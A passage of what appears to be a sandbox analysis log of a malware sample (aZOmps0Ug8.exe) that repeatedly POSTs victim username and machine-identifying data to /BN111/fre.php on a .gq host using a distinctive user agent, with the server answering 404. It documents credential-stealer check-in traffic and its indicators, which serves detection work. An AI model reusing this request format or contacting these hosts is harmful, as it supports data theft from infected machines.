                      Oct 14, 2021 08:30:02.562702894 CEST7937OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:02.660093069 CEST7938INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ga%2FiBjWS7EnclaPLKo1yPnxw%2BS5FfTFKHZyEfv8SBx7PLc2z9qVP39s4Ou2jxC%2Fu692YAeRobnrXUUs%2FH5lz44oFoe0MdOk11UK7d0oa85kJs8BzBG9Wn1TN%2BaAxNOIaqjCVMknge%2BA0NpNTHFqXMCVwFECLVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1b9fcbb4a6d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.649786172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:27.340971947 CEST1068OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:27.357132912 CEST1068OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:27.495248079 CEST1069INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OvCReYL5kOGzCHk1X2inrDg3LE1il6%2B7FTgD%2FXIswLKX9fCBRgXz9DRTR%2BULHUkhSfhznG6alUky58mQbc1ir%2ByqnxuDkYKD854tu9UOoiYexIWXj8lJVJPVQ2nEQja6fVQg5wAHAZeKEplbfNmZMMqLBlJM6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf66ec32692b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      70192.168.2.649929172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:03.716522932 CEST7939OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:03.732362986 CEST7939OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:03.830050945 CEST7940INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYEXv8S4QiPBTpXu0rf5bJXcJoQvbh8c7zrS9vvc7tBBFtqt%2FvJ59pUThsIsz8qJpgBGda1LHR3Qb02pkkKRC8u7P6%2BBRoVadCg8Od0Z6UP29X6bSAT1Hn6xm8BlysHdhvQ59Xz1U2tY28nHS%2BqgJgDxQY4HdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1c14c3ad6f5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      71192.168.2.649930172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:04.877321005 CEST7941OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:04.893264055 CEST7941OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:04.995676041 CEST7942INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yauK70pfnNL%2FJ90goDaRLF0fpdY6QkzTDmTkMnqaOy%2Bzsu%2BpC4W1kWkeLla6LwdlVBR9OMv4e4x9fXwxwON1%2FUNUz5VC3UtbTzqe0Ta8KCEmGddTn%2FYX5GbiYSC%2B8T4y3Jh3h%2FGtVWT8LEgia0f88sVfgxwueQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1c88f4e3258-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      72192.168.2.649931172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:05.956295967 CEST7943OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:05.974153042 CEST7943OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:06.071351051 CEST7944INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqfohRhEiuDGtoufJZoPIftug9rZXOY0iplMIhBxlnIZUjBXtab%2FI2jNrquCvC6cysFzwjayYPJM%2BQ8Xe4Icd2EQlB4ETqyyfmXIN7wgx7vriAXvx8gP%2BAmVX2ww%2FgOFnLGPHUENBicNBv5tAeMhrHNfgSR2tA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1cf4b1f63a7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      73192.168.2.649932172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:07.140644073 CEST7945OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:07.157073021 CEST7945OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:07.263822079 CEST7946INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eh8lR2VHuAd%2FabpYZW9tpbFbJtxx01L9yZN5vGSXcrxQt3sIQfCGSqyacaB9%2B3Hw2oVJwF7e7qyBl6EoN3hd1Wz7J66UUWTW97%2FegdbTRtYUGZPwPUIns9dbsm4VjmIJ9oYFMURDSLbk44n2badK3lPcW%2BIZzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1d6ad835bf5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      74192.168.2.649933104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:08.437280893 CEST7947OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:08.453376055 CEST7947OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:08.602293968 CEST7948INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M5tlpUopTFHdy2B09YRTb%2FcsTy7c1X2dY3sawEtin9CRp7iwQ7kHGGeqkAEUkgyYEQSHRIXi8G%2B0%2FPlXdk8CRXuTrtKeambiuJ5qPkn23PNVP4W0WpwprTjFbDp1IbPCTt%2F3Cd91aLWDrwa0e1cclMTu%2Brzvhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1decf8e5373-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      75192.168.2.649934172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:09.692348003 CEST7949OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:09.708596945 CEST7949OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:09.817987919 CEST7950INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gHyoRfXpo3hYuDnMEqyfZQc%2BSSKitG5uVBPt%2FzcNSAReJa%2FdnOJKlN8woQLzqA6DJAKzj%2BBAgAMnotpu0f8pMIviMGE3p2X%2FOL6fJxdXzYrzgTzXXn262LF8tX4wih8wIb1Yn%2F1EvqCxP1YMpsu0Nm4iCqvv%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1e69e5e4e50-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      76192.168.2.649935104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:11.132683992 CEST7951OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:11.148772955 CEST7951OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:11.253345966 CEST7952INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XYPD7fSpOyQ9pBkkU7r%2Fv6SPQi%2By9UIzK%2B1PLsu1iFdzjzfJxzg08bwcNFnidoj1OFoTBYyGcRQqcfhRC5k8KnU8iYCvp%2FGLncP9ixeP9Nbj206KsQTvNUsDuvNAU27cTMUZR%2BeQ6CClwmRmdofqKK5juL3eYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1ef9dc84e2b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      77192.168.2.649936172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:13.066123962 CEST7953OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:13.081940889 CEST7953OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:13.193157911 CEST7954INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x2j5ZLeoHVLB0M3bMqX0PzaoLtVYEwCKEvGv1b3ZVT4MA7hLssUg4vrSoTR%2FE5D5SrSs6jQ1VXmZshZU40BlhiqRYtlB0oP0EeQEYcVIqQcXMEb13j5XLdZzrzFppZlNUH%2BxojLr5SNYRD263tyDlV%2Fqs9%2BBWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1fbbfb5beec-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      78192.168.2.649937104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:15.336416006 CEST7955OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:15.352566957 CEST7955OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:15.454026937 CEST7956INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIfWEe%2F6jyIr5T7SRE1AvZoCaCYM%2FbFVg7K%2BtIrH%2Bg2cqN5BZ7bF9LkzYb8H4TcHvLJGxjEene%2BEEAvpDhWU%2BAObyNoj5WQ%2FY8B2zI6QnfWVy2Mj3GhLDrM5%2B3ZllzuKto5k5eS%2FKyLRpb%2B6WFBaRW9j4UK%2F8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec209ed614e3e-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      79192.168.2.649938172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:16.682401896 CEST7957OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:16.698534966 CEST7957OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:16.810215950 CEST7958INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOgqfzVELnT4zNLoiR%2FSN41Qdg4UYQCVdsKnFsPBrdghsXz7OOBzVnpKSPLQWJtPGBZRxeNAZ9xU4Mal%2FMaGqsNeP9SMc6UxO7qEZCv8h9fhuYogsRPNLHTuEjgFMYjq%2FGbTIEqvZDq8c1MmmAw0PfhreX1fCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec2124acf0eb7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.649787172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:30.289741993 CEST1070OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:30.307250023 CEST1070OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:30.451376915 CEST1071INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Hk46wdoG1U27nz707h6QtW1GUw2h6o9OisNkyhB2aYUTsS7ahwfcM37s0X%2BXm8zCJMTqINkuUnoOUc6RiTwkeUHqopnJbQ82UpWA9CyU9N%2BqKVbZ2JX9RAD3Z5d9c3nY2pdXuQ2K39C%2BMU9nFo%2Bj20Dqe22SQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf795ca042e1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      80192.168.2.649939172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:18.312437057 CEST7959OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:18.328321934 CEST7959OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:30:18.426697016 CEST7960INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
